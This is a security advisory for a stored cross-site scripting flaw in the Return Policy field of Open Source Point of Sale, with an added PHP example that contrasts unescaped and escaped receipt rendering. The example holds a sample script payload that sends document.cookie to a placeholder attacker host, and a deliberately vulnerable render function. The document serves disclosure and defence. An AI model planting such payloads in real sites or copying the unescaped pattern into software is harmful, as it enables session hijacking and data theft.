Description
Open Source Point of Sale (opensourcepos) is a web-based point of sale application written in PHP using the CodeIgniter framework. Starting in version 3.4.0 and prior to 3.4.2, a Stored Cross-Site Scripting (XSS) vulnerability exists in the "Return Policy" configuration field. The application does not properly sanitize user input before saving it to the database or displaying it on receipts. An attacker with access to "Store Configuration" (such as a rogue administrator, or an account compromised via a separate CSRF vulnerability) can inject malicious JavaScript payloads into this field. These payloads are executed in the browser of any user (including other administrators and sales staff) whenever they view a receipt or complete a transaction. This can lead to session hijacking, theft of sensitive data, or unauthorized actions performed on behalf of the victim. The issue has been patched in version 3.4.2 by ensuring the output is escaped with the `esc()` function in the template. As a temporary mitigation, administrators should ensure the field contains only plain text and strictly avoid entering HTML tags. There is no code-based workaround other than applying the patch.
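The following is an added illustration, not code from the opensourcepos repository or the advisory. It contrasts raw interpolation of the Return Policy value into a receipt template (the pre-3.4.2 behaviour the advisory describes) with output escaping in the HTML context (the 3.4.2 fix). The sample payload is constructed, the receipt markup is hypothetical, and `esc_html()` is a stand-in that reproduces what CodeIgniter's `esc()` does for its default `html` context (htmlspecialchars with `ENT_QUOTES | ENT_SUBSTITUTE`, UTF-8); `is_plain_text()` is a hypothetical helper for the interim "plain text only" advice, not a substitute for the patch.

```php
<?php
declare(strict_types=1);

// Constructed sample input: what a rogue administrator could save in the
// "Return Policy" field. Real payloads vary; this one exfiltrates cookies
// to an attacker-controlled host (attacker.example is a placeholder).
$returnPolicy = 'No refunds after 30 days.'
    . '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Stand-in for CodeIgniter's esc() in its default 'html' context (assumption:
// mirrors Laminas Escaper::escapeHtml, which is htmlspecialchars with
// ENT_QUOTES | ENT_SUBSTITUTE and UTF-8).
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable rendering: the stored value lands in the receipt unchanged, so the
// <script> element is parsed and run by every browser that shows the receipt.
function render_receipt_vulnerable(string $policy): string
{
    return '<p class="return-policy">' . $policy . '</p>';
}

// Fixed rendering: the same value is escaped at output time, so the browser
// shows the literal text "<script>..." instead of executing it.
function render_receipt_fixed(string $policy): string
{
    return '<p class="return-policy">' . esc_html($policy) . '</p>';
}

// Hypothetical check for the advisory's temporary mitigation: flag any value
// that contains markup. This only supports an operator reviewing the field;
// output escaping (above) is what actually closes the issue.
function is_plain_text(string $value): bool
{
    return $value === strip_tags($value);
}

echo "Vulnerable receipt fragment:\n";
echo render_receipt_vulnerable($returnPolicy), "\n\n";

echo "Fixed receipt fragment:\n";
echo render_receipt_fixed($returnPolicy), "\n\n";

echo 'Return Policy is plain text: ', is_plain_text($returnPolicy) ? 'yes' : 'no', "\n";
```

Run it with `php example.php`: the vulnerable fragment contains a live `<script>` element, while the fixed fragment contains `&lt;script&gt;...&lt;/script&gt;`, and the plain-text check reports `no` for the constructed value. Note that escaping must match the output context; `esc()` with its `html` context is correct for element content like this, but a value placed inside a JavaScript block or an attribute needs the corresponding context instead.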
https://github.com/Nixon-H/CVE-2025-68147-OSPOS-Stored-XSS
https://github.com/opensourcepos/opensourcepos/commit/22297a
https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-xgr7-7pvw-fpmh